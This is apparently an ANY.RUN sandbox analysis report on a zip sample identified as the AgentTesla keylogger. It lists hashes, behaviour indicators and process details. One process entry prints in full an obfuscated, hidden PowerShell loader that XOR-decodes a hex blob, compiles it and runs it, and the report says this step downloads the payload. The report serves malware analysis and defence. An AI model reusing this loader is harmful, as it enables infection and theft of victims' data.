General Info

File name

Sample1.zip

Full analysis
https://app.any.run/tasks/a549cf45-5e21-4305-a3a6-5f9532d07375
Verdict
Malicious activity
Analysis date
8/13/2019, 17:27:51
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

opendir

loader

keylogger

agenttesla

evasion

trojan

rat

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

68c412b442347675e074f1f99fea14bb

SHA1

57c43bb8140ed2802815e98822843563f456ec78

SHA256

71b59f2caf632375cb44b0a8765d9aa094629254c0564fb316bfa2660282b137

SSDEEP

768:pVF1caFXHHfZWTcEFTZ5gQ7TbGoLkMFnk:DcSHhB8Z5gcb1wMFk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Changes the autorun value in the registry
  • yb264b.exe (PID: 3788)
Downloads executable files from the Internet
  • powershell.exe (PID: 492)
AGENTTESLA was detected
  • yb264b.exe (PID: 3788)
Starts Visual C# compiler
  • powershell.exe (PID: 492)
Application was dropped or rewritten from another process
  • yb264b.exe (PID: 3672)
  • yb264b.exe (PID: 3788)
Actions looks like stealing of personal data
  • yb264b.exe (PID: 3788)
Checks for external IP
  • yb264b.exe (PID: 3788)
Reads Environment values
  • yb264b.exe (PID: 3788)
Creates files in the user directory
  • yb264b.exe (PID: 3788)
  • cmd.exe (PID: 3192)
  • powershell.exe (PID: 492)
Reads Windows Product ID
  • yb264b.exe (PID: 3788)
Cleans NTFS data-stream (Zone Identifier)
  • yb264b.exe (PID: 3788)
Starts CMD.EXE for commands execution
  • yb264b.exe (PID: 3672)
Application launched itself
  • yb264b.exe (PID: 3672)
Executable content was dropped or overwritten
  • yb264b.exe (PID: 3788)
  • powershell.exe (PID: 492)
PowerShell script executed
  • powershell.exe (PID: 492)
Executed via WMI
  • powershell.exe (PID: 492)
Reads settings of System Certificates
  • yb264b.exe (PID: 3788)
Creates files in the user directory
  • opera.exe (PID: 2324)
  • WINWORD.EXE (PID: 3164)
Manual execution by user
  • opera.exe (PID: 2324)
  • WINWORD.EXE (PID: 3164)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3164)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
788
ZipBitFlag:
0x0001
ZipCompression:
Deflated
ZipModifyDate:
2019:08:13 15:25:26
ZipCRC:
0x322c05c7
ZipCompressedSize:
36225
ZipUncompressedSize:
39182
ZipFileName:
b64867b16525cbe3dab4f81ddf2134bdfc2e7de62b1600cf7819ed88dc859eb0.bin

Screenshots

Processes

Total processes
47
Monitored processes
9
Malicious processes
3
Suspicious processes
0

Behavior graph

+
start download and start winrar.exe no specs winword.exe no specs powershell.exe csc.exe cvtres.exe no specs yb264b.exe no specs cmd.exe no specs opera.exe #AGENTTESLA yb264b.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2900
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sample1.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
3164
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ayy.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\program files\common files\microsoft shared\textconv\wpft532.cnv
c:\program files\common files\microsoft shared\textconv\msconv97.dll
c:\program files\common files\microsoft shared\textconv\wpft632.cnv
c:\program files\common files\microsoft shared\textconv\recovr32.cnv
c:\program files\common files\microsoft shared\textconv\wks9pxy.cnv
c:\windows\system32\userenv.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\prntvpt.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll

PID
492
CMD
powershell -WindowStyle Hidden function md293 { param($fc9bf9) $d7b938 = 's3a8d65';$a8bf975 = ''; for ($i = 0; $i -lt $fc9bf9.length; $i+=2) { $c13d2b = [convert]::ToByte($fc9bf9.Substring($i, 2), 16); $a8bf975 += [char]($c13d2b -bxor $d7b938[($i / 2) % $d7b938.length]); } return $a8bf975; } $r3edcbb = '064008560316660a40155d090d40005a0f5f44654c004704554a64401d47085501187c1d47044a0b466616411751075346484612510a5115204a124c015b1b375a005f0a5946075a024b5f43461a5d0618374f4607560c162d790e064008560316660a40155d09187b16475a356e4640115f085b4455591240121800040110501a63205a593a5e115716421d5158044a0a535940014314215841014a31570d58414e11265d1066471c50205c0044500040431139164506510d51071646075215510716500b47044a0a167c1d47314c16164d4502560e4c7f5b0763154a44570216500509531a460741085603165e4107500e06551c48682554087f58035c134c4c145e16410f5d080507511f417d0a42470a630e510a42154e1343740b57513f5a034a05444c511a3c181443571f5a0218174254075a0218014e4116410f182d5841234713180053061650494b10445c1d544159525451471a5a63205a593a5e115716421d5158044a0a53594001431444735b074118680b5f5b070e436e0d444106520d681659411650151a4d6b15034603540d55150047004c0d5515164b155d165815115c0e54444c034006005c4c7f5b0763154a4450574656545c5c1a603a5d15681044151906075b025719534608561016511657050f071a151c461518115f5b0713125a575400121a5a63205a593a5e115716421d5178044a0a535940014f5c085a175f13245610444c235c0856100b1721470d750b40503e560c57164f175f13325d107a540047244a1659474e55005417531c2e13124c05425c101304401053471d1317570d52151751590a0755515b7a0f4c3442475347540b020354101f285610664101130d0e570401110b4d510a42151105020056071c4843145a085f5653401559105f56535a0f4c445d54405753104d4d7c1d47314c1616471652530f0100154e13055d5753565b5e050a5d051d5102530d010707460255595104004a02071a4d1f0e1a55494a01570744565705597f5b0763154a4a6c50015c48430359411c13160f06550d484e28561066410113065e5c0750470b5c40520702451b135d05040216054d5500040c401b430b56035042015409570100460655090001044207545d5404004007561a4d1f0e1a55495f020e0416075905597f5b0763154a4a6c50015c48430359411c13160f06550d484e34710a426507414141535757410757054c637c1d47314c161f004846085610164744075401530b05485a0710454c034006005c4c51534b02040c5c1a4c4452030a500019434b55084859400713130f50030c441a48430359411c13160f06550d484e234110536e2e13160b0755514e485140570719434b075e48064d4a031c032d584123471318120f0c10555305295747005b00544a77591f5c0270235a5a11520d10571f0e3e52134b0c57595d700e481d1e424050025c480619050a585b020419401a5a5c060e07105005100a5342537a0f4c3442475b5407005553014b1d35572d5841450749114f064d4303505a4d1a434a0a025e561a065a08160f06550d4913365d0675591a560f4c445354475207050a53425364045a275a5c165d15104d0d460741085603164d4107590d520b701d45084a0b5858165d1516235341355c0d5c014465124709102158431a410e5609535b071d324801555c125f2757085250011d2048145a5c105215510b5871124700114f14692f4a030a52025751180c5c560f065b11545c5100044a06051a4d0d501207005e4a725a045d0d570552731a5f04100952074a00491a5554014402540c5c0350420a50595501004b07020c050602420b540e5555001607040d560702420a560e55550010030509510505470054085152004502580d00141c5f4b530c5c03035a08314a0b55500040324c0544413a5d0757445e53150052050a5342536313570753460060155916427c1d550e101c04014b0657115f66471c50044b1718660752134c4c5e53150052115f44500746135644060e0e43145a085f5653401559105f565340154a0d5852535e050a5d051d004713510a51150001520d051f4e004713510a51151204045b0007024e11120b050e51450643031742471a5d061800530616505c6b10445c1d544f7d0946410a080757161e5c1d47415159060e1a0f120a5703545d7f045603425d485a4a05561f4e114a155d444e034204570527595b0556134c4a625a314a155d4c450740060016374357004713510a511d1a1f53114807035a08055d575356580e495b0c57475a1b190e550103536d4159535356170256634c5f1a411a411d44570216500509531879165d064c0c6b1c484e135d1043471d13055d575356484e1c'; $r3edcbb2 = md293($r3edcbb); Add-Type -TypeDefinition $r3edcbb2; [d24cc]::ka3d2();
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.jscript\b3fde69f9642ab464bd3389f1fe3c5bd\microsoft.jscript.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\roaming\yb264b.exe
c:\windows\system32\netutils.dll

PID
2648
CMD
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\df5laeek.cmdline"
Path
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Image
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\microsoft.net\framework\v2.0.50727\cscomp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v2.0.50727\alink.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorpe.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\apphelp.dll

PID
4080
CMD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES746A.tmp" "c:\Users\admin\AppData\Local\Temp\CSC7459.tmp"
Path
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Image
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll

PID
3672
CMD
"C:\Users\admin\AppData\Roaming\yb264b.exe"
Path
C:\Users\admin\AppData\Roaming\yb264b.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
inigujesekaquguxol
Description
apigomir
Version
7.11.14.18
Modules
Image
c:\users\admin\appdata\roaming\yb264b.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\97e047cf68e9a7d90e196d072cd49cac\mscorlib.ni.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\oleaut32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\5ac17cc5b92efda83e2925857f4fa655\system.numerics.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\e071297bb06faa961bef045ae5f25fdc\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\e588691224a17737f3a164cc2d46c156\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.drawing\61dfb69c9ad6ed96809170d54d80b8a6\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\21a1606b6c00f9abe7db55c02e0f87c9\system.core.ni.dll
